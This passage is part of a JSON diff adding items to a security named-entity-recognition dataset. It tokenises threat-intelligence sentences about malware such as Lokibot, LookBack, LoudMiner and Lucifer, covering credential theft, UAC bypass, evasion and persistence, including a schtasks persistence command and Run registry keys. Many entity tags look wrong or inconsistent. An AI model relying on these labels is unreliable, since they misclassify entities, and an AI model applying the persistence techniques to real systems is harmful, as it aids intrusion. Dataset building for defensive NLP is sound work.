"O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoJax", + "is", + "a", + "UEFI", + "BIOS", + "rootkit", + "deployed", + "to", + "persist", + "remote", + "access", + "software", + "on", + "some", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoJax", + "is", + "a", + "UEFI", + "BIOS", + "rootkit", + "deployed", + "to", + "persist", + "remote", + "access", + "software", + "on", + "some", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "been", + "observed", + "changing", + "account", + "passwords", + "and", + "logging", + "off", + "current", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "been", + "signed", + "with", + "stolen", + "certificates", + "in", + "order", + "to", + "make", + "it", + "look", + "more", + "legitimate." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "encrypted", + "files,", + "including", + "core", + "Windows", + "OS", + "files,", + "using", + "RSA-OAEP", + "MGF1", + "and", + "then", + "demanded", + "Bitcoin", + "be", + "paid", + "for", + "the", + "decryption", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "installation", + "has", + "been", + "immediately", + "preceded", + "by", + "a", + "\"task", + "kill\"", + "command", + "in", + "order", + "to", + "disable", + "anti-virus." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "been", + "observed", + "deleting", + "its", + "original", + "launcher", + "after", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "been", + "observed", + "moving", + "around", + "the", + "victim", + "network", + "via", + "SMB,", + "indicating", + "the", + "actors", + "behind", + "this", + "ransomware", + "are", + "manually", + "copying", + "files", + "form", + "computer", + "to", + "computer", + "instead", + "of", + "self-propagating." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LockerGoga", + "has", + "been", + "observed", + "shutting", + "down", + "infected", + "systems." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "utilized", + "multiple", + "techniques", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "stolen", + "credentials", + "from", + "multiple", + "applications", + "and", + "data", + "sources", + "including", + "Windows", + "OS", + "credentials,", + "email", + "clients,", + "FTP,", + "and", + "SFTP", + "clients." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "demonstrated", + "the", + "ability", + "to", + "steal", + "credentials", + "from", + "multiple", + "applications", + "and", + "data", + "sources", + "including", + "Safari", + "and", + "the", + "Chromium", + "and", + "Mozilla", + "Firefox-based", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "decoded", + "and", + "decrypted", + "its", + "stages", + "multiple", + "times", + "using", + "hard-coded", + "keys", + "to", + "deliver", + "the", + "final", + "payload,", + "and", + "has", + "decoded", + "its", + "server", + "response", + "hex", + "string", + "using", + "XOR." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "initiate", + "contact", + "with", + "command", + "and", + "control", + "(C2)", + "to", + "exfiltrate", + "stolen", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "will", + "delete", + "its", + "dropped", + "files", + "after", + "bypassing", + "UAC." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "can", + "search", + "for", + "specific", + "files", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "copy", + "itself", + "to", + "a", + "hidden", + "file", + "and", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "downloaded", + "several", + "staged", + "items", + "onto", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "capture", + "input", + "on", + "the", + "compromised", + "host", + "via", + "keylogging." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "tricked", + "recipients", + "into", + "enabling", + "malicious", + "macros", + "by", + "getting", + "victims", + "to", + "click", + "\"enable", + "content\"", + "in", + "email", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "modified", + "the", + "Registry", + "as", + "part", + "of", + "its", + "UAC", + "bypass", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "LoadLibrary(),", + "GetProcAddress()", + "and", + "CreateRemoteThread()", + "API", + "functions", + "to", + "execute", + "its", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "obfuscated", + "strings", + "with", + "base64", + "encoding." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "PowerShell", + "commands", + "embedded", + "inside", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "process", + "hollowing", + "to", + "inject", + "itself", + "into", + "legitimate", + "Windows", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "reflectively", + "loaded", + "the", + "decoded", + "DLL", + "into", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "embedded", + "the", + "commands", + "<code>schtasks", + "/Run", + "/TN", + "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup", + "/I</code>", + "inside", + "a", + "batch", + "script." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot's", + "second", + "stage", + "DLL", + "has", + "set", + "a", + "timer", + "using", + "“timeSetEvent”", + "to", + "schedule", + "its", + "next", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "several", + "packing", + "methods", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "is", + "delivered", + "via", + "a", + "malicious", + "XLS", + "attachment", + "contained", + "within", + "a", + "spearhpishing", + "email." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "discover", + "the", + "computer", + "name", + "and", + "Windows", + "product", + "name/version." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "discover", + "the", + "domain", + "name", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "the", + "ability", + "to", + "discover", + "the", + "username", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "performed", + "a", + "time-based", + "anti-debug", + "check", + "before", + "downloading", + "its", + "third", + "stage." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "VBS", + "scripts", + "and", + "XLS", + "macros", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lokibot", + "has", + "used", + "<code>cmd", + "/c</code>", + "commands", + "embedded", + "within", + "batch", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "side", + "loads", + "its", + "communications", + "module", + "as", + "a", + "DLL", + "into", + "the", + "<code>libcurl.dll</code>", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "has", + "a", + "function", + "that", + "decrypts", + "malicious", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "LookBack", + "removes", + "itself", + "after", + "execution", + "and", + "can", + "delete", + "files", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "retrieve", + "file", + "listings", + "from", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "has", + "a", + "C2", + "proxy", + "tool", + "that", + "masquerades", + "as", + "<code>GUP.exe</code>,", + "which", + "is", + "software", + "used", + "by", + "Notepad++." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "uses", + "a", + "custom", + "binary", + "protocol", + "over", + "sockets", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "sets", + "up", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "a", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "take", + "desktop", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "kill", + "processes", + "and", + "delete", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "uses", + "a", + "modified", + "version", + "of", + "RC4", + "for", + "data", + "transfer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "enumerate", + "services", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "can", + "shutdown", + "and", + "reboot", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "has", + "used", + "VBA", + "macros", + "in", + "Microsoft", + "Word", + "attachments", + "to", + "drop", + "additional", + "files", + "to", + "the", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack’s", + "C2", + "proxy", + "tool", + "sends", + "data", + "to", + "a", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LookBack", + "executes", + "the", + "<code>cmd.exe</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "has", + "obfuscated", + "various", + "scripts." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "is", + "typically", + "bundled", + "with", + "pirated", + "copies", + "of", + "Virtual", + "Studio", + "Technology", + "(VST)", + "for", + "Windows", + "and", + "macOS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "has", + "encrypted", + "DMG", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "deleted", + "installation", + "files", + "after", + "completion." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "has", + "set", + "the", + "attributes", + "of", + "the", + "VirtualBox", + "directory", + "and", + "VBoxVmService", + "parent", + "directory", + "to", + "\"hidden\"." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "SCP", + "to", + "update", + "the", + "miner", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "adds", + "plist", + "files", + "with", + "the", + "naming", + "format", + "<code>com.[random_name].plist</code>", + "in", + "the", + "<code>/Library/LaunchDaemons</code>", + "folder", + "with", + "the", + "RunAtLoad", + "and", + "KeepAlive", + "keys", + "set", + "to", + "<code>true</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "launched", + "the", + "QEMU", + "services", + "in", + "the", + "<code>/Library/LaunchDaemons/</code>", + "folder", + "using", + "<code>launchctl</code>.", + "It", + "also", + "uses", + "<code>launchctl</code>", + "to", + "unload", + "all", + "Launch", + "Daemons", + "when", + "updating", + "to", + "a", + "newer", + "version", + "of", + "LoudMiner." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "an", + "MSI", + "installer", + "to", + "install", + "the", + "virtualization", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "the", + "<code>ps</code>", + "command", + "to", + "monitor", + "the", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "harvested", + "system", + "resources", + "to", + "mine", + "cryptocurrency,", + "using", + "XMRig", + "to", + "mine", + "Monero." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "has", + "used", + "QEMU", + "and", + "VirtualBox", + "to", + "run", + "a", + "Tiny", + "Core", + "Linux", + "virtual", + "machine,", + "which", + "runs", + "XMRig", + "and", + "makes", + "connections", + "to", + "the", + "C2", + "server", + "for", + "updates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "started", + "the", + "cryptomining", + "virtual", + "machine", + "as", + "a", + "service", + "on", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "has", + "monitored", + "CPU", + "usage." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "a", + "script", + "to", + "gather", + "the", + "IP", + "address", + "of", + "the", + "infected", + "machine", + "before", + "sending", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "shell", + "scripts", + "to", + "launch", + "various", + "services", + "and", + "to", + "start/stop", + "the", + "QEMU", + "virtualization." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg" + ] + }, + { + "tokens": [ + "LoudMiner", + "used", + "a", + "batch", + "script", + "to", + "run", + "the", + "Linux", + "virtual", + "machine", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoudMiner", + "can", + "automatically", + "launch", + "a", + "Linux", + "virtual", + "machine", + "as", + "a", + "service", + "at", + "startup", + "if", + "the", + "AutoStart", + "option", + "is", + "enabled", + "in", + "the", + "VBoxVmService", + "configuration", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Lslsass", + "can", + "dump", + "active", + "logon", + "session", + "password", + "hashes", + "from", + "the", + "lsass", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "use", + "the", + "Stratum", + "protocol", + "on", + "port", + "10001", + "for", + "communication", + "between", + "the", + "cryptojacking", + "bot", + "and", + "the", + "mining", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "clear", + "and", + "remove", + "event", + "logs." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "decrypt", + "its", + "C2", + "address", + "upon", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "exploit", + "multiple", + "vulnerabilities", + "including", + "EternalBlue", + "(CVE-2017-0144)", + "and", + "EternalRomance", + "(CVE-2017-0144)." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "B-Way", + "B-Features" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "download", + "and", + "execute", + "a", + "replica", + "of", + "itself", + "using", + "certutil." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "use", + "certutil", + "for", + "propagation", + "on", + "Windows", + "hosts", + "within", + "intranets." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "execute", + "TCP,", + "UDP,", + "and", + "HTTP", + "denial", + "of", + "service", + "(DoS)", + "attacks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "scan", + "for", + "open", + "ports", + "including", + "TCP", + "ports", + "135", + "and", + "1433." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "has", + "attempted", + "to", + "brute", + "force", + "TCP", + "ports", + "135", + "(RPC)", + "and", + "1433", + "(MSSQL)", + "with", + "the", + "default", + "username", + "or", + "list", + "of", + "usernames", + "and", + "passwords." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "identify", + "the", + "process", + "that", + "owns", + "remote", + "connections." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "check", + "for", + "existing", + "stratum", + "cryptomining", + "information", + "in", + "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr", + "–", + "%stratum", + "info%</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "persist", + "by", + "setting", + "Registry", + "key", + "values", + "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>", + "and", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "use", + "system", + "resources", + "to", + "mine", + "cryptocurrency,", + "dropping", + "XMRig", + "to", + "mine", + "Monero." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "infect", + "victims", + "by", + "brute", + "forcing", + "SMB." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lucifer", + "has", + "established", + "persistence", + "by", + "creating", + "the", + "following", + "scheduled", + "task", + "<code>schtasks", + "/create", + "/sc", + "minute", + "/mo", + "1", + "/tn", + "QQMusic", + "^", + "/tr", + "C:Users\\%USERPROFILE%\\Downloads\\spread.exe", + "/F</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "has", + "used", + "UPX", + "packed", + "binaries." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "perform", + "a", + "decremental-xor", + "encryption", + "on", + "the", + "initial", + "C2", + "request", + "before", + "sending", + "it", + "over", + "the", + "wire." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "check", + "for", + "specific", + "usernames,", + "computer", + "names,", + "device", + "drivers,", + "DLL's,", + "and", + "virtual", + "devices", + "associated", + "with", + "sandboxed", + "environments", + "and", + "can", + "enter", + "an", + "infinite", + "loop", + "and", + "stop", + "itself", + "if", + "any", + "are", + "detected." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "collect", + "the", + "computer", + "name,", + "system", + "architecture,", + "default", + "language,", + "and", + "processor", + "frequency", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "collect", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "identify", + "the", + "IP", + "and", + "port", + "numbers", + "for", + "all", + "remote", + "connections", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "has", 